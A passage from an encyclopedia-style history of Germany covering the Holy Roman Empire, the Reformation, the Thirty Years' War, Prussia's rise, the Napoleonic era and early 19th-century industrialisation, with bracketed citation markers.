Henry V, great-grandson of Conrad II, who had overthrown his father Henry IV, became Holy Roman Emperor in 1111. Hoping to gain greater control over the church inside the Empire, Henry V appointed Adalbert of Saarbrücken as the powerful archbishop of Mainz in the same year. Adalbert began to assert the powers of the Church against secular authorities, that is, the Emperor. This precipitated the "Crisis of 1111", yet another chapter of the long-term Investiture Controversy.[102] In 1137, the prince-electors turned back to the Hohenstaufen family for a candidate, Conrad III. Conrad tried to divest his rival Henry the Proud of his two duchies – Bavaria and Saxony – which led to war in southern Germany as the empire was divided into two powerful factions. The faction of the Welfs or Guelphs (in Italian) supported the House of Welf of Henry the Proud, the ruling dynasty in the Duchy of Bavaria. The rival faction of the Waiblings or Ghibellines (in Italian) pledged allegiance to the Swabian House of Hohenstaufen. During this early period, the Welfs generally maintained ecclesiastical independence under the papacy and political particularism (the focus on ducal interests against the central imperial authority). The Waiblings, on the other hand, championed strict control of the church and a strong central imperial government.[103]
During the reign of the Hohenstaufen emperor Frederick I (Barbarossa), an accommodation was reached in 1156 between the two factions. The Duchy of Bavaria was returned to Henry the Proud's son Henry the Lion, duke of Saxony, who represented the Guelph party. However, the Margraviate of Austria was separated from Bavaria and turned into the independent Duchy of Austria by virtue of the Privilegium Minus in 1156.[104]
Having become wealthy through trade, the confident cities of Northern Italy, supported by the Pope, increasingly opposed Barbarossa's claim of feudal rule (Honor Imperii) over Italy. The cities united in the Lombard League and finally defeated Barbarossa in the Battle of Legnano in 1176. The following year a reconciliation was reached between the emperor and Pope Alexander III in the Treaty of Venice.[105] The 1183 Peace of Constance eventually settled that the Italian cities remained loyal to the empire but were granted local jurisdiction and full regal rights in their territories.[106]
In 1180, Henry the Lion was outlawed, Saxony was divided, and Bavaria was given to Otto of Wittelsbach, who founded the Wittelsbach dynasty, which was to rule Bavaria until 1918.
From 1184 to 1186, the empire under Frederick I Barbarossa reached its cultural peak with the Diet of Pentecost held at Mainz and the marriage of his son Henry in Milan to the Norman princess Constance of Sicily.[107] The power of the feudal lords was undermined by the appointment of ministerials (unfree servants of the Emperor) as officials. Chivalry and court life flowered, as expressed in the scholastic philosophy of Albertus Magnus and the literature of Wolfram von Eschenbach.[108]
Between 1212 and 1250, Frederick II established a modern, professionally administered state from his base in Sicily. He resumed the conquest of Italy, leading to further conflict with the Papacy. In the Empire, extensive sovereign powers were granted to ecclesiastical and secular princes, leading to the rise of independent territorial states. The struggle with the Pope sapped the Empire's strength, as Frederick II was excommunicated three times. After his death, the Hohenstaufen dynasty fell, followed by an interregnum during which there was no Emperor (1250–1273). The interregnum came to an end with the election of a minor Swabian count, Rudolf of Habsburg, as king.[109][110]
The failure of negotiations between Emperor Louis IV and the papacy led to the 1338 Declaration at Rhense by six princes of the Imperial Estates to the effect that election by all or the majority of the electors automatically conferred the royal title and rule over the empire, without papal confirmation. As a result, the monarch was no longer subject to papal approbation and became increasingly dependent on the favour of the electors. Between 1346 and 1378 Emperor Charles IV of Luxembourg, king of Bohemia, sought to restore imperial authority. The 1356 decree of the Golden Bull stipulated that all future emperors were to be chosen by a college of only seven electors – four secular and three clerical. The secular electors were the King of Bohemia, the Count Palatine of the Rhine, the Duke of Saxony, and the Margrave of Brandenburg; the clerical electors were the Archbishops of Mainz, Trier, and Cologne.[111]
Between 1347 and 1351 Germany and almost the entire European continent were consumed by the most severe outbreak of the Black Death pandemic. Estimated to have caused the abrupt death of 30 to 60% of Europe's population, it led to widespread social and economic disruption and deep religious disaffection and fanaticism. Minority groups, and Jews in particular, were blamed, singled out and attacked. As a consequence, many Jews fled and resettled in Eastern Europe.[112][113]
Total population estimates of the German territories range around 5 to 6 million by the end of Henry III's reign in 1056 and about 7 to 8 million after Friedrich Barbarossa's rule in 1190.[114][115] The vast majority were farmers, typically in a state of serfdom under feudal lords and monasteries.[103] Towns gradually emerged, and in the 12th century many new cities were founded along the trading routes and near imperial strongholds and castles. The towns were subjected to the municipal legal system. Cities such as Cologne, which had acquired the status of Imperial Free Cities, were no longer answerable to the local landlords or bishops but were immediate subjects of the Emperor and enjoyed greater commercial and legal liberties.[116] The towns were ruled by a council of the – usually mercantile – elite, the patricians. Craftsmen formed guilds, governed by strict rules, which sought to obtain control of the towns; a few were open to women. Society had diversified, but was divided into sharply demarcated classes of the clergy, physicians, merchants, various guilds of artisans, unskilled day labourers and peasants. Full citizenship was not available to paupers. Political tensions arose from issues of taxation, public spending, regulation of business, and market supervision, as well as the limits of corporate autonomy.[117]
Cologne's central location on the Rhine river placed it at the intersection of the major trade routes between east and west and was the basis of Cologne's growth.[118] The economic structures of medieval and early modern Cologne were characterized by the city's status as a major harbor and transport hub on the Rhine. It was the seat of an archbishop, under whose patronage the vast Cologne Cathedral was built from 1240 onwards. The cathedral houses sacred Christian relics and has since become a well-known pilgrimage destination. By 1288 the city had secured its independence from the archbishop (who relocated to Bonn) and was ruled by its burghers.[119]
Benedictine abbess Hildegard von Bingen wrote several influential theological, botanical, and medicinal texts, as well as letters, liturgical songs, poems, and arguably the oldest surviving morality play, Ordo Virtutum, while supervising brilliant miniature illuminations. About 100 years later, Walther von der Vogelweide became the most celebrated of the Minnesänger, the Middle High German lyric poets.
Around 1439, Johannes Gutenberg of Mainz used movable-type printing and issued the Gutenberg Bible. His invention of the printing press started the Printing Revolution in Europe. Cheap printed books and pamphlets played central roles in the spread of the Reformation and the Scientific Revolution.
Around the transition from the 15th to the 16th century, Albrecht Dürer from Nuremberg established his reputation across Europe as painter, printmaker, mathematician, engraver, and theorist while still in his twenties, securing his place as one of the most important figures of the Northern Renaissance.
Early modern European society gradually developed after the disasters of the 14th century as religious obedience and political loyalties declined in the wake of the Great Plague, the schism of the Church and prolonged dynastic wars. The rise of the cities and the emergence of the new burgher class eroded the societal, legal and economic order of feudalism.[127]
The commercial enterprises of the mercantile elites in the quickly developing cities of South Germany (such as Augsburg and Nuremberg) – with the most prominent families being the Gossembrots, the Fuggers (the wealthiest family in Europe during the fifteenth and sixteenth centuries[130]), the Welsers, the Hochstetters and the Imholts – generated unprecedented financial means. As financiers to both the leading ecclesiastical and secular rulers, these families fundamentally influenced political affairs in the empire during the fifteenth and sixteenth centuries.[131][132][133][134] The increasingly money-based economy also provoked social discontent among knights and peasants, and predatory "robber knights" became common.[135]
From 1438 the Habsburg dynasty – which had acquired control over the Duchy of Austria in the south-east of the empire and, after the death of King Louis II in 1526, over Bohemia and Hungary – managed to occupy the position of Holy Roman Emperor permanently until 1806 (with the exception of the years between 1742 and 1745).
Some Europe-wide revolutions were born in the Empire: the combination of the first modern postal system, established by Maximilian (with its management under the Taxis family), with the printing system invented by Gutenberg produced a communication revolution.[136][137][138] The Empire's decentralized nature made censorship difficult, which combined with the new communication system to facilitate free expression and thus elevated cultural life. The system also helped the authorities to disseminate orders and policies, boosted the Empire's coherence in general, and helped reformers like Luther to broadcast their views and communicate with each other effectively, thus contributing to the religious Reformation.[139][140][141]
Maximilian's military reforms, especially his development of the Landsknechte, caused a military revolution that broke the back of the knight class[142][143] and spread all over Europe shortly after his death.[144][145]
During his reign from 1493 to 1519, Maximilian I, in a combined effort with the Estates (who sometimes acted as opponents and sometimes as cooperators), his officials and his humanists, reformed the empire. A dual system of supreme courts (the Reichskammergericht and the Reichshofrat) was established (with the Reichshofrat playing the more efficient role during the Early Modern period),[150] together with the formalized reception of Roman law;[151][152][153][154] the Imperial Diet (Reichstag) became the all-important political forum and the supreme legal and constitutional institution, which would act as a guarantee for the preservation of the Empire in the long run;[155][156] a Perpetual Land Peace (Ewiger Landfriede) was declared in 1495, with regional leagues and unions providing the supporting structure, together with the creation of the Reichskreise (Imperial Circles, which would serve the purpose of organizing imperial armies, collecting taxes and enforcing orders of the imperial institutions);[157][158][159] the Imperial and Court Chanceries were combined to become the decisive government institution;[160][161] the Landsknechte that Maximilian created became a form of imperial army;[162] a national political culture began to emerge;[163][164] and the German language began to attain a unified form.[165][166] The political structure remained incomplete and piecemeal though, mainly due to the failure of the Common Penny (an imperial tax) that the Estates resisted.[150][a] Through many compromises between emperor and Estates, however, a flexible, future-oriented problem-solving mechanism for the Empire was formed, together with a monarchy through which the emperor shared power with the Estates.[168][b] Whether the Reform also equated to a (successful or unsuccessful) nation-building process remains a debate.[170]
The addition Nationis Germanicæ (of German Nation) to the emperor's title appeared first in the 15th century: in a 1486 law decreed by Frederick III, and in 1512 in reference to the Imperial Diet in Cologne by Maximilian I. In 1525, the Heilbronn reform plan – the most advanced document of the German Peasants' War (Deutscher Bauernkrieg) – referred to the Reich as von Teutscher Nation (of German nation). During the fifteenth century, the term "German nation" witnessed a rise in use due to the growth of a "community of interests". The Estates also increasingly distinguished between their German Reich and the wider, "universal" Reich.[171]
In order to manage their ever-growing expenses, the Renaissance Popes of the 15th and early 16th century promoted the excessive sale of indulgences and of offices and titles of the Roman Curia.
In 1517, the monk Martin Luther published a pamphlet with 95 Theses that he posted in the town square of Wittenberg, handing copies to feudal lords. Whether he nailed them to a church door at Wittenberg remains unclear. The list detailed 95 assertions that, he argued, represented corrupt practice of the Christian faith and misconduct within the Catholic Church. Although perhaps not Luther's chief concern, he received popular support for his condemnation of the sale of indulgences and clerical offices, of the pope's and higher clergy's abuse of power, and for his doubts about the very idea of the institution of the Church and the papacy.[172]
The Protestant Reformation was the first successful challenge to the Catholic Church and began in 1521 when Luther was outlawed at the Diet of Worms after his refusal to repent. The ideas of the Reformation spread rapidly, as the new technology of the printing press ensured cheap mass copies and distribution of the theses, helped by Emperor Charles V's wars with France and the Turks.[172] Hiding in the Wartburg Castle, Luther translated the Bible into German, thereby greatly contributing to the establishment of the modern German language. This is highlighted by the fact that Luther spoke only a local dialect of minor importance at that time. After the publication of his Bible, his dialect superseded others and constitutes to a great extent what is now modern German. With the protestation of the Lutheran princes at the Imperial Diet of Speyer in 1529 and the acceptance and adoption of the Lutheran Augsburg Confession by the Lutheran princes beginning in 1530, the separate Lutheran church was established.[173]
The German Peasants' War, which began in the southwest in Alsace and Swabia and spread further east into Franconia, Thuringia and Austria, was a series of economic and religious revolts of the rural lower classes against the ruling feudal lords, encouraged by the rhetoric of various radical religious reformers and Anabaptists. Although occasionally assisted by war-experienced noblemen like Götz von Berlichingen and Florian Geyer (in Franconia) and the theologian Thomas Müntzer (in Thuringia), the peasant forces lacked military structure, skill, logistics and equipment, and as many as 100,000 insurgents were eventually defeated and massacred by the territorial princes.[174]
The Catholic Counter-Reformation, initiated in 1545 at the Council of Trent, was spearheaded by the scholarly Jesuit order, founded just five years earlier by several clerics around Ignatius of Loyola. Its intent was to challenge and contain the Protestant Reformation via apologetic and polemical writings and decrees, ecclesiastical reconfiguration, wars and imperial political maneuverings. In 1547, emperor Charles V defeated the Schmalkaldic League, a military alliance of Protestant rulers.[175] The 1555 Peace of Augsburg decreed the recognition of the Lutheran faith and the religious division of the empire. It also stipulated the ruler's right to determine the official confession in his principality (Cuius regio, eius religio). The Counter-Reformation ultimately failed to reintegrate the central and northern German Lutheran states. In 1608/1609 the Protestant Union and the Catholic League were formed.
The 1618 to 1648 Thirty Years' War, which took place almost exclusively in the Holy Roman Empire, has its origins – which remain widely debated – in the unresolved and recurring conflicts between the Catholic and Protestant factions. The Catholic emperor Ferdinand II attempted to achieve the religious and political unity of the empire, while the opposing Protestant Union forces were determined to defend their religious rights. The religious motive served as the universal justification for the various territorial and foreign princes, who over the course of several stages joined either of the two warring parties in order to gain land and power.[176][177]
The conflict was sparked by the revolt of the Protestant nobility of Bohemia against emperor Matthias' succession policies. After the imperial triumph at the Battle of White Mountain and a short-lived peace, the war grew into a political European conflict through the intervention of King Christian IV of Denmark from 1625 to 1630, Gustavus Adolphus of Sweden from 1630 to 1648 and France under Cardinal Richelieu from 1635 to 1648. The conflict increasingly evolved into a struggle between the French House of Bourbon and the House of Habsburg for predominance in Europe, for which the central German territories of the empire served as the battleground.[178]
The war ranks among the most catastrophic in history, as three decades of constant warfare and destruction left the land devastated. Marauding armies incessantly pillaged the countryside, seized and levied heavy taxes on cities and indiscriminately plundered the food stocks of the peasantry. There were also countless bands of murderous outlaws and sick, homeless, displaced people and invalid soldiery. The overall social and economic disruption caused a dramatic decline in population as a result of indiscriminate killings and rape, endemic infectious diseases, crop failures, famine, declining birth rates, wanton burglary, witch-hunts and the emigration of terrified people. Estimates vary between a 38% drop from 16 million people in 1618 to 10 million by 1650 and a mere 20% drop from 20 million to 16 million. The Altmark and Württemberg regions were especially hard hit; it took generations for them to fully recover.[176][179]
The war was the last major religious struggle in mainland Europe and ended in 1648 with the Peace of Westphalia. It resulted in increased autonomy for the constituent states of the Holy Roman Empire, limiting the power of the emperor. Most of Alsace was ceded to France, Western Pomerania and Bremen-Verden were given to Sweden as Imperial fiefs, and the Netherlands officially left the Empire.[180]
The population of Germany reached about twenty million people by the mid-16th century, the great majority of whom were peasant farmers.[182]
The Protestant Reformation was a triumph for literacy and the new printing press.[183][c][185][186] Luther's translation of the Bible into High German (the New Testament was published in 1522; the Old Testament was published in parts and completed in 1534) was a decisive impulse for the increase of literacy in early modern Germany,[181] and stimulated the printing and distribution of religious books and pamphlets. From 1517 onward religious pamphlets flooded Germany and much of Europe. The Reformation instigated a media revolution, as by 1530 over 10,000 individual works had been published with a total of ten million copies. Luther strengthened his attacks on Rome by depicting a "good" against a "bad" church. It soon became clear that print could be used for propaganda in the Reformation for particular agendas. Reform writers used pre-Reformation styles, clichés, and stereotypes and changed items as needed for their own purposes.[187] Especially effective were Luther's Small Catechism, for parents teaching their children, and Larger Catechism, for pastors.[188] Using the German vernacular, they expressed the Apostles' Creed in simpler, more personal, Trinitarian language. Illustrations in the newly translated Bible and in many tracts popularized Luther's ideas. Lucas Cranach the Elder, the painter patronized by the electors of Wittenberg, was a close friend of Luther and illustrated Luther's theology for a popular audience. He dramatized Luther's views on the relationship between the Old and New Testaments, while remaining mindful of Luther's careful distinctions about proper and improper uses of visual imagery.[189]
Luther's translation of the Bible into High German was also decisive for the German language and its evolution from Early New High German to Modern Standard German.[181] The publication of Luther's Bible was a decisive moment in the spread of literacy in early modern Germany;[181] it promoted the development of non-local forms of language and exposed all speakers to forms of German from outside their own area.[190]
Notable late fifteenth- to early eighteenth-century polymaths include: Johannes Trithemius, one of the founders of modern cryptography, founder of steganography, as well as of bibliography and literary studies as branches of knowledge;[191][192][193] Conrad Celtes, the first and foremost German cartographic writer and "the greatest lyric genius and certainly the greatest organizer and popularizer of German Humanism";[194][195][196][197] Athanasius Kircher, described by Fletcher as "a founder figure of various disciplines—of geology (certainly vulcanology), musicology (as a surveyor of musical forms), museum curatorship, Coptology, to name a few—and might be claimed today as the first theorist of gravity and a long-term originator of the moving pictures (with his magic lantern shows). Through his many enthusiasms, moreover, he was the conduit of others' pursuits in the rapidly widening horizon of knowledge that marks the later Renaissance.";[198] and Gottfried Wilhelm Leibniz, one of the greatest, if not the greatest, "universal geniuses" of all time.[199][200]
Cartography developed strongly at the beginning of the sixteenth century, with Nuremberg as its center. Martin Waldseemüller and Matthias Ringmann's Universalis Cosmographia and the 1513 edition of Geography marked the climax of a cartographic revolution.[201][202] The emperor himself dabbled in cartography.[203]
In 1515, Johannes Stabius (court astronomer under Maximilian I), Albrecht Dürer and the astronomer Konrad Heinfogel produced the first planispheres of both the southern and northern hemispheres, which were also the first printed celestial maps. These maps prompted a revival of interest in the field of uranometry throughout Europe.[204][205][206][207]
Astronomer Johannes Kepler from Weil der Stadt was one of the pioneering minds of empirical and rational research. Through rigorous application of the principles of the scientific method he derived his laws of planetary motion. His ideas influenced the contemporary Italian scientist Galileo Galilei and provided fundamental mechanical principles for Isaac Newton's theory of universal gravitation.[208]
German colonies in the Americas existed because the Free Imperial Cities of Augsburg and Nuremberg obtained colonial rights in the Province of Venezuela in the north of South America in return for debts owed by the Holy Roman Emperor Charles V, who was also King of Spain. In 1528, Charles V issued a charter by which the Welser family received the rights to explore, rule and colonize the area, also with the motivation of searching for the legendary golden city of El Dorado. Their principal colony was Klein-Venedig. A never-realized colonial project was Hanauish-Indies, intended by Friedrich Casimir, Count of Hanau-Lichtenberg, as a fief of the Dutch West India Company. The project failed due to a lack of funds and the outbreak of the Franco-Dutch War in 1672.
Frederick William, ruler of Brandenburg-Prussia from 1640 and later called the Great Elector, acquired East Pomerania via the Peace of Westphalia in 1648. He reorganized his loose and scattered territories and managed to throw off the vassalage of Prussia under the Kingdom of Poland during the Second Northern War.[212] In order to address the demographic problem of Prussia's largely rural population of about three million, he attracted the immigration and settlement of French Huguenots in urban areas. Many became craftsmen and entrepreneurs.[213] King Frederick William I, known as the Soldier King, who reigned from 1713 to 1740, established the structures for the highly centralized Prussian state and raised a professional army that was to play a central role.[214] He also successfully operated a command economy that some historians consider mercantilist.[215][216]
The total population of Germany (in its 1914 territorial extent) grew from 16 million in 1700 to 17 million in 1750 and reached 24 million in 1800. The 18th-century economy noticeably profited from widespread practical application of the scientific method, as greater yields, a more reliable agricultural production and the introduction of hygienic standards positively affected the balance of birth and death rates.[217]
Louis XIV of France waged a series of successful wars in order to extend the French territory. He occupied Lorraine (1670) and annexed the remainder of Alsace (1678–1681), which included the free imperial city of Straßburg. At the start of the Nine Years' War, he also invaded the Electorate of the Palatinate (1688–1697).[218] Louis established a number of courts whose sole function was to reinterpret historic decrees and treaties, the Treaties of Nijmegen (1678) and the Peace of Westphalia (1648) in particular, in favor of his policies of conquest. He considered the conclusions of these courts, the Chambres de réunion, as sufficient justification for his boundless annexations. Louis' forces operated inside the Holy Roman Empire largely unopposed, because all available imperial contingents fought in Austria in the Great Turkish War. The Grand Alliance of 1689 took up arms against France and countered any further military advances of Louis. The conflict ended in 1697 as both parties agreed to peace talks after each side had realized that a total victory was financially unattainable. The Treaty of Ryswick provided for the return of Lorraine and Luxembourg to the empire and the abandonment of French claims to the Palatinate.[219]
After the last-minute relief of Vienna from a siege and imminent seizure by a Turkish force in 1683, the combined troops of the Holy League, founded the following year, embarked on the military containment of the Ottoman Empire and reconquered Hungary in 1687.[220] The Papal States, the Holy Roman Empire, the Polish–Lithuanian Commonwealth, the Republic of Venice and, from 1686, Russia had joined the league under the leadership of Pope Innocent XI. Prince Eugene of Savoy, who served under emperor Leopold I, took supreme command in 1697 and decisively defeated the Ottomans in a series of spectacular battles and manoeuvres. The 1699 Treaty of Karlowitz marked the end of the Great Turkish War, and Prince Eugene continued his service for the Habsburg monarchy as president of the War Council. He effectively ended Turkish rule over most of the territorial states in the Balkans during the Austro-Turkish War of 1716–1718. The Treaty of Passarowitz left Austria free to establish royal domains in Serbia and the Banat and to maintain hegemony in Southeast Europe, on which the future Austrian Empire was based.[221][222]
Frederick II "the Great" is best known for his military genius, his unique utilisation of the highly organized army to make Prussia one of the great powers in Europe, and his escape from almost certain national disaster at the last minute. He was also an artist, author and philosopher, who conceived and promoted the concept of enlightened absolutism.[223][224]
Austrian empress Maria Theresa succeeded in bringing the 1740 to 1748 war for recognition of her succession to the throne to a favorable conclusion. However, Silesia was permanently lost to Prussia as a consequence of the Silesian Wars and the Seven Years' War. The 1763 Treaty of Hubertusburg ruled that Austria and Saxony had to relinquish all claims to Silesia. Prussia, which had nearly doubled its territory, was eventually recognized as a great European power, with the consequence that the politics of the following century were fundamentally influenced by German dualism, the rivalry of Austria and Prussia for supremacy in Central Europe.[225]
The concept of enlightened absolutism, although rejected by the nobility and citizenry, was advocated in Prussia and Austria and implemented from 1763. Prussian king Frederick II defended the idea in an essay and argued that the benevolent monarch simply is the first servant of the state, who exercises his absolute political power for the benefit of the population as a whole. A number of legal reforms (e.g. the abolition of torture and the emancipation of the rural population and the Jews), the reorganization of the Prussian Academy of Sciences, the introduction of compulsory education for boys and girls, and the promotion of religious tolerance, among others, caused rapid social and economic development.[226]
Between 1772 and 1795 Prussia instigated the partitions of Poland by occupying the western territories of the former Polish–Lithuanian Commonwealth. Austria and Russia resolved to acquire the remaining lands, with the effect that Poland ceased to exist as a sovereign state until 1918.[227]
The smaller German states were overshadowed by Prussia and Austria. Bavaria had a rural economy. Saxony was in economically good shape, although numerous wars had taken their toll. During the time when Prussia rose rapidly within Germany, Saxony was distracted by foreign affairs: the House of Wettin concentrated on acquiring and then holding on to the Polish throne, an effort that was ultimately unsuccessful.[228]
Many of the smaller states of Germany were run by bishops who in reality came from powerful noble families and showed scant interest in religion. While none of the later ecclesial rulers matched the outstanding reputation of Mainz's Johann Philipp von Schönborn or Münster's Christoph Bernhard von Galen, some of them promoted the Enlightenment, like the benevolent and progressive Franz Ludwig von Erthal in Würzburg and Bamberg.[229]
In Hesse-Kassel, the Landgrave Frederick II ruled from 1760 to 1785 as an enlightened despot and raised money by renting soldiers (called "Hessians") to Great Britain to help fight the American Revolutionary War. He combined Enlightenment ideas with Christian values, cameralist plans for central control of the economy, and a militaristic approach toward diplomacy.[230]
Hanover did not have to support a lavish court—its rulers were also kings of England and resided in London. George III, elector (ruler) from 1760 to 1820, never once visited Hanover. The local nobility who ran the country opened the University of Göttingen in 1737; it soon became a world-class intellectual center. Baden sported perhaps the best government of the smaller states. Karl Friedrich ruled for 73 years and was an enthusiast for the Enlightenment; he abolished serfdom in 1783.[231]
The smaller states failed to form coalitions with each other and were eventually overwhelmed by Prussia, which swallowed up many of them between 1807 and 1871.[232]
Prussia underwent major social change between the mid-17th and mid-18th centuries. The traditional aristocracy declined as the nobility struggled to compete with the rising merchant class,[233] which developed into a new bourgeois middle class.[234][235][236] The emancipation of the serfs granted the rural peasantry land purchasing rights and freedom of movement,[237] and a series of agrarian reforms in northwestern Germany abolished feudal obligations and divided up feudal land, giving rise to wealthier peasants and paving the way for a more efficient rural economy.[238]
During the mid-18th century, the recognition and application of Enlightenment cultural, intellectual and spiritual ideals and standards led to a flourishing of art, music, philosophy, science and literature. The philosopher Christian Wolff was a pioneering author in a vast number of fields of Enlightenment rationality, and established German as the prevailing language of philosophical reasoning, scholarly instruction and research.[239]
In 1685, Elector Frederick William of Brandenburg-Prussia issued the Edict of Potsdam within a week of French king Louis XIV's Edict of Fontainebleau, which decreed the abolition of the 1598 concession to free religious practice for Protestants. Frederick William offered his co-religionists, "who are oppressed and assailed for the sake of the Holy Gospel and its pure doctrine ... a secure and free refuge in all Our Lands".[240] Around 20,000 Huguenot refugees arrived in an immediate wave and settled in the cities, 40% of them in Berlin, the electoral residence, alone. The French Lyceum in Berlin was established in 1689, and by the end of the 17th century French had replaced Latin as the universal language of international diplomacy. The nobility and the educated middle class of Prussia and the various German states increasingly used the French language in public conversation, in combination with universally cultivated manners. Like no other German state, Prussia had access to, and the skill set for, the application of pan-European Enlightenment ideas to develop more rational political and administrative institutions.[241] The princes of Saxony carried out a comprehensive series of fundamental fiscal, administrative, judicial, educational, cultural and general economic reforms. The reforms were aided by the country's strong urban structure and influential commercial groups, who modernized pre-1789 Saxony along the lines of classic Enlightenment principles.[242]
Johann Gottfried von Herder broke new ground in philosophy and poetry as a leader of the Sturm und Drang movement of proto-Romanticism. Weimar Classicism ("Weimarer Klassik") was a cultural and literary movement based in Weimar that sought to establish a new humanism by synthesizing Romantic, classical, and Enlightenment ideas. The movement, from 1772 until 1805, involved Herder as well as polymath Johann Wolfgang von Goethe and Friedrich Schiller, a poet and historian. Herder argued that every folk had its own particular identity, which was expressed in its language and culture. This legitimized the promotion of German language and culture and helped shape the development of German nationalism. Schiller's plays expressed the restless spirit of his generation, depicting the hero's struggle against social pressures and the force of destiny.[243]
German music, sponsored by the upper classes, came of age under composers Johann Sebastian Bach, Joseph Haydn, and Wolfgang Amadeus Mozart.[244]
Königsberg philosopher Immanuel Kant tried to reconcile rationalism and religious belief, individual freedom and political authority. Kant's work contained basic tensions that would continue to shape German thought – and indeed all of European philosophy – well into the 20th century.[245][246] The ideas of the Enlightenment and their implementation received general approval and recognition as a principal cause of widespread cultural progress.[247]
German reaction to the French Revolution was mixed at first. German intellectuals celebrated the outbreak, hoping to see the triumph of Reason and the Enlightenment. The royal courts in Vienna and Berlin denounced the overthrow of the king and the threatened spread of notions of liberty, equality, and fraternity. By 1793, the execution of the French king and the onset of the Terror disillusioned the Bildungsbürgertum (educated middle classes). Reformers said the solution was to have faith in the ability of Germans to reform their laws and institutions in peaceful fashion.[248]
Europe was racked by two decades of war revolving around France's efforts to spread its revolutionary ideals, and the opposition of reactionary royalty. War broke out in 1792 as Austria and Prussia invaded France, but were defeated at the Battle of Valmy (1792). The German lands saw armies marching back and forth, bringing devastation (albeit on a far lower scale than the Thirty Years' War, almost two centuries before), but also bringing new ideas of liberty and civil rights for the people. Prussia and Austria ended their failed wars with France but (with Russia) partitioned Poland among themselves in 1793 and 1795.
France took control of the Rhineland, imposed French-style reforms, abolished feudalism, established constitutions, promoted freedom of religion, emancipated Jews, opened the bureaucracy to ordinary citizens of talent, and forced the nobility to share power with the rising middle class. Napoleon created the Kingdom of Westphalia as a model state.[249] These reforms proved largely permanent and modernized the western parts of Germany. When the French tried to impose the French language, German opposition grew in intensity. A Second Coalition of Britain, Russia, and Austria then attacked France but failed. Napoleon established direct or indirect control over most of western Europe, including the German states apart from Prussia and Austria. The old Holy Roman Empire was little more than a farce; Napoleon simply abolished it in 1806 while forming new countries under his control. In Germany Napoleon set up the "Confederation of the Rhine", comprising most of the German states except Prussia and Austria.[250]
Under Frederick William II's weak rule (1786–1797), Prussia underwent a serious economic, political and military decline. His successor, King Frederick William III, tried to remain neutral during the War of the Third Coalition and French emperor Napoleon's dissolution of the Holy Roman Empire and reorganisation of the German principalities. Induced by the queen and a pro-war party, Frederick William joined the Fourth Coalition in October 1806. Napoleon easily defeated the Prussian army at the Battle of Jena and occupied Berlin. Prussia lost its recently acquired territories in western Germany, its army was reduced to 42,000 men, no trade with Britain was allowed, and Berlin had to pay Paris high reparations and fund the French army of occupation. Saxony changed sides to support Napoleon and joined the Confederation of the Rhine. Its ruler, Frederick Augustus I, was rewarded with the title of king and given a part of Poland taken from Prussia, which became known as the Duchy of Warsaw.[251]
After Napoleon's military fiasco in Russia in 1812, Prussia allied with Russia in the Sixth Coalition. A series of battles followed, and Austria joined the alliance. Napoleon was decisively defeated in the Battle of Leipzig in late 1813. The German states of the Confederation of the Rhine defected to the Coalition against Napoleon, who rejected any peace terms. Coalition forces invaded France in early 1814, Paris fell, and in April Napoleon surrendered. Prussia, as one of the winners at the Congress of Vienna, gained extensive territory.[217]
In 1815, continental Europe was in a state of overall turbulence and exhaustion as a consequence of the French Revolutionary and Napoleonic Wars. The liberal spirit of the Enlightenment and Revolutionary era gave way to Romanticism.[252] The victorious members of the Coalition had negotiated a new peaceful balance of powers in Vienna and agreed to maintain a stable German heartland that would keep French imperialism at bay. However, the idea of reviving the defunct Holy Roman Empire was discarded. Napoleon's reorganization of the German states was continued and the remaining princes were allowed to keep their titles. Already in 1813, in return for guarantees from the Allies that the sovereignty and integrity of the southern German states (Baden, Württemberg, and Bavaria) would be preserved, they had broken with France.[253]
During the 1815 Congress of Vienna the 39 former states of the Confederation of the Rhine joined the German Confederation, a loose agreement for mutual defense. Attempts at economic integration and customs coordination were frustrated by repressive anti-national policies. Great Britain approved of the union, convinced that a stable, peaceful entity in central Europe could discourage aggressive moves by France or Russia. Most historians, however, concluded that the Confederation was weak and ineffective and an obstacle to German nationalism. The union was undermined by the creation of the Zollverein in 1834, the 1848 revolutions and the rivalry between Prussia and Austria, and was finally dissolved in the wake of the Austro-Prussian War of 1866, to be replaced by the North German Confederation the same year.[254]
Increasingly after 1815, a centralized Prussian government based in Berlin took over the powers of the nobles, which in terms of control over the peasantry had been almost absolute. To help the nobility avoid indebtedness, Berlin set up a credit institution to provide capital loans in 1809, and extended the loan network to peasants in 1849. When the German Empire was established in 1871, the Junker nobility controlled the army and the navy, the bureaucracy, and the royal court; they generally set governmental policies.[255]
Between 1815 and 1865 the population of the German Confederation (excluding Austria) grew by around 60%, from 21 million to 34 million.[256] Simultaneously the demographic transition took place, as the high birth rates and high death rates of the pre-industrial country shifted to the low birth and death rates of a fast-growing, industrialized urban economic and agricultural system. Increased agricultural productivity secured a steady food supply, as famines and epidemics declined. This allowed people to marry earlier and have more children. The high birthrate was offset by a very high rate of infant mortality and, after 1840, by large-scale emigration to the United States. Emigration totaled 480,000 in the 1840s, 1,200,000 in the 1850s, and 780,000 in the 1860s. The upper and middle classes first practiced birth control, which was soon universally adopted.[257]
In 1800, Germany's social structure was poorly suited to entrepreneurship or economic development. Domination by France during the French Revolutionary era (1790s to 1815), however, produced important institutional reforms, including the abolition of feudal restrictions on the sale of large landed estates, the reduction of the power of the guilds in the cities, and the introduction of a new, more efficient commercial law. Whether these reforms were beneficial for industrialization remains a subject of debate among historians.[258]
In the early 19th century the Industrial Revolution was in full swing in Britain, France, and Belgium. The various small German states developed only slowly and autonomously, as competition among them was strong. Early investments in the railway network during the 1830s came almost exclusively from private hands. Without a central regulatory agency, construction projects were quickly realized. Actual industrialization only took off after 1850, in the wake of railroad construction.[259] The textile industry grew rapidly, profiting from the elimination of tariff barriers by the Zollverein.[260][261] During the second half of the 19th century German industry grew exponentially, and by 1900 Germany was an industrial world leader along with Britain and the United States.[262]
In 1800, the population was predominantly rural, as only 10% lived in communities of 5,000 or more people, and only 2% lived in cities of more than 100,000 people. After 1815, the urban population grew rapidly, due to the influx of young people from the rural areas. Berlin grew from 172,000 inhabitants in 1800 to 826,000 in 1870, Hamburg from 130,000 to 290,000, Munich from 40,000 to 269,000 and Dresden from 60,000 to 177,000.[263]
The initial stage of economic development came with the railroad revolution in the 1840s, which opened up new markets for local products, created a pool of middle managers, increased the demand for engineers, architects and skilled machinists, and stimulated investments in coal and iron. Political disunity among three dozen states and a pervasive conservatism made it difficult to build railways in the 1830s. However, by the 1840s, trunk lines did link the major cities; each German state was responsible for the lines within its own borders. Economist Friedrich List summed up the advantages to be derived from the development of the railway system in 1841.
